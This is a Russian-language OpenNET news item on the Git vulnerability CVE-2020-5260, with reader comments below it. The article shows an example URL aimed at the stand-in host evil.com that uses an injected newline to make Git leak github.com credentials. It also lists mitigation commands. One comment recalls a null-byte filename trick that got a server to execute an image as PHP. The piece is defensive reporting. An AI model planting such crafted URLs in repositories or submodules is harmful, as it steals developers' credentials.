The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Уязвимость в Git, приводящая к утечке учётных данных

14.04.2020 23:03

Опубликованы корректирующие выпуски распределённой системы управления исходными текстами Git 2.26.1, 2.25.3, 2.24.2, 2.23.2, 2.22.3, 2.21.2, 2.20.3, 2.19.4, 2.18.3 и 2.17.4, в которых устранена уязвимость (CVE-2020-5260) в обработчике "credential.helper", приводящая к отправке учётных данных не на тот хост при обращении git-клиента к репозиторию по специально оформленному URL, содержащему символ новой строки. Уязвимость можно использовать для организации отправки на сервер, подконтрольный атакующему, учётных данных от другого хоста.

При указании URL вида "https://evil.com?%0ahost=github.com/" обработчик учётных данных при подключении к хосту evil.com передаст параметры аутентификации, заданные для github.com. Проблема проявляется при выполнении таких операций, как "git clone", в том числе при обработке URL для субмодулей (например, при выполнении "git submodule update" будут автоматически обработаны URL, заданные в файле .gitmodules из репозитория). Наибольшую опасность уязвимость представляет в ситуациях, когда разработчик выполняет клонирование репозитория не видя URL, например, при работе с субмодулями, или в системах, выполняющих автоматические действия, например, в скриптах сборки пакетов.

Для блокирования уязвимости в новых версиях запрещена передача символа новой строки в любых значениях, передаваемых через протокол обмена учётными данными. Для дистрибутивов проследить за выпуском обновлений пакетов можно на страницах Debian, Ubuntu, RHEL, SUSE/openSUSE, Fedora, Arch, FreeBSD. В качестве обходного пути блокирования проблемы рекомендуется не использовать credential.helper при обращении к публичным репозиториям и не применять "git clone" в режиме "--recurse-submodules" с непроверенными репозиториями. Для полного отключения обработчика credential.helper, который выполняет сохранение и извлечение паролей из кэша, защищённого хранилища или файла с паролями, можно использовать команды: 


   git config --unset credential.helper
   git config --global --unset credential.helper
   git config --system --unset credential.helper


  1. Главная ссылка к новости (https://lkml.org/lkml/2020/4/1...)
  2. OpenNews: Обновление Git с устранением 8 уязвимостей
  3. OpenNews: В Git устранена уязвимость, которая может привести к выполнению кода атакующего
  4. OpenNews: Обновление Git с устранением уязвимостей
  5. OpenNews: Уязвимость в Git, Subversion и Mercurial, допускающая подстановку команд через URL ssh://
  6. OpenNews: Выпуск Git 2.4.11, 2.5.5 и 2.6.6 и 2.7.4 с устранением критических уязвимостей
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/52734-git
Ключевые слова: git
При перепечатке указание ссылки на opennet.ru обязательно
Обсуждение (13) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, Аноним (1), 23:22, 14/04/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    >Для полного отключения обработчика gitcredentials, который выполняет сохранение и извлечение паролей их кэша, защищённого хранилища или файла с паролями

    Это типа хотели как лучше, а получилось как всегда?

     
  • 1.2, Аноним (2), 23:31, 14/04/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    это бонус к бесплатным репозиториям
     
  • 1.3, Аноним (3), 23:50, 14/04/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• +/
    >содержащему символ новой строки

    Ужасно, ужасно. Самая частая ошибка в софте. Создайте файл с таким символом и скормите его разному софту. 100% скриптов посыпется (если они конечно не написаны мной) и больше половины самого разного софта (кстати, респект gnu tar -- он не подвержен в отличие от некоторых конкурентов).

     
     
  • 2.4, Аноним (4), 00:02, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    > 100% скриптов посыпется (если они конечно не написаны мной)

    И как сделать, чтобы не посыпались?

     
     
  • 3.5, Аноним (3), 00:04, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Использовать \0 для разделения строк. Praise GNU.
     
     
  • 4.8, Аноним (8), 00:36, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• –1 +/
    С \0 свои приколы, когда "паскалевские" строки (длина + char*, могут содержать \0) обрабатываются функциями из стандартной библиотеки C.

    Например, когда-то был то ли в апаче, то ли в каком еще вебсервере баг, когда URL вида image.jpg%00.php приводил к интерпретации содержимого картинки как PHP-кода (а по принципу rarjpeg-а засунуть в картинку php-код не проблема).

     

  • 1.6, th3m3 (ok), 00:34, 15/04/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –3 +/
    Всё. Мелкомягкие пришли, теперь это место проклято.
     
     
  • 2.9, Аноним (9), 00:36, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Это место такое.
     
  • 2.11, Punk_Joker (ok), 01:41, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• +3 +/
    Хорошо, что Вы как и многие знаете разницу между Git и Github
     
     
  • 3.12, th3m3 (ok), 02:22, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    А всё уже. Пошло заражение дальше.
     

  • 1.7, Аноним (9), 00:35, 15/04/2020 [ответить] [﹢﹢﹢] [ · · · ]  
    		• –1 +/
    Очередная дыркоподелка Линуса. Быстро, Бесплатно, Дыряво.
     
     
  • 2.10, Gemorroj (ok), 00:56, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    еще и не быстро)
     
  • 2.13, Аноним (13), 03:07, 15/04/2020 [^] [^^] [^^^] [ответить]  
    		• +/
    Удваиваю.
    мимо бздун
     
     Добавить комментарий
    Имя:
    E-Mail:
    Текст:

    Спонсоры:
    Слёрм
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей     		Created 1996-2020 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру